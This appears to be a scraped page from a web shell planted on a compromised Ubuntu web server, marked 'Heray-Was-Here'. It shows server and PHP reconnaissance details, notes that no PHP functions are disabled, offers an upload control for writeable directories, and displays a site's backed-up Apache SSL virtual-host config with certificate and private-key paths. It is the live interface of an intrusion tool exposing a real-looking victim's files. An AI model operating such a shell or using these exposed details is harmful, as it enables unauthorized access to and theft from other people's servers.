Heray-Was-Here
Server : Apache/2.4.52 (Ubuntu)
System : Linux webserver9 5.15.0-170-generic #180-Ubuntu SMP Fri Jan 9 16:10:31 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.2-1ubuntu2.24
Disable Function : NONE
Directory :  /var/lib/letsencrypt/backups/1731177225.513686/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/lib/letsencrypt/backups/1731177225.513686/cwalakestreet.com-le-ssl.conf_0
<IfModule mod_ssl.c>
<VirtualHost *:443>
    ServerName cwalakestreet.com
    ServerAlias www.cwalakestreet.com
    DocumentRoot /var/www/cwalakestreet.com
    <Directory /var/www/cwalakestreet.com>
        Options FollowSymLinks
        AllowOverride Limit Options FileInfo
        DirectoryIndex index.php
        Require all granted
    </Directory>
#   <Directory /var/www/cwalakestreet.com/wp-content>
#       Options FollowSymLinks
#       Require all granted
#   </Directory>
RewriteEngine on
# Some rewrite rules in this file were disabled on your HTTPS site,
# because they have the potential to create redirection loops.

# RewriteCond %{SERVER_NAME} =www.cwalakestreet.com [OR]
# RewriteCond %{SERVER_NAME} =cwalakestreet.com
# RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [END,NE,R=permanent]

Include /etc/letsencrypt/options-ssl-apache.conf
SSLCertificateFile /etc/letsencrypt/live/cwalakestreet.com/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/cwalakestreet.com/privkey.pem
</VirtualHost>
</IfModule>
<IfModule mod_ssl.c>
<VirtualHost *:80>
    ServerName cwalakestreet.com
    ServerAlias www.cwalakestreet.com
    DocumentRoot /var/www/cwalakestreet.com
    <Directory /var/www/cwalakestreet.com>
        Options FollowSymLinks
        AllowOverride Limit Options FileInfo
        DirectoryIndex index.php
        Require all granted
    </Directory>

</VirtualHost>
</IfModule>

Hry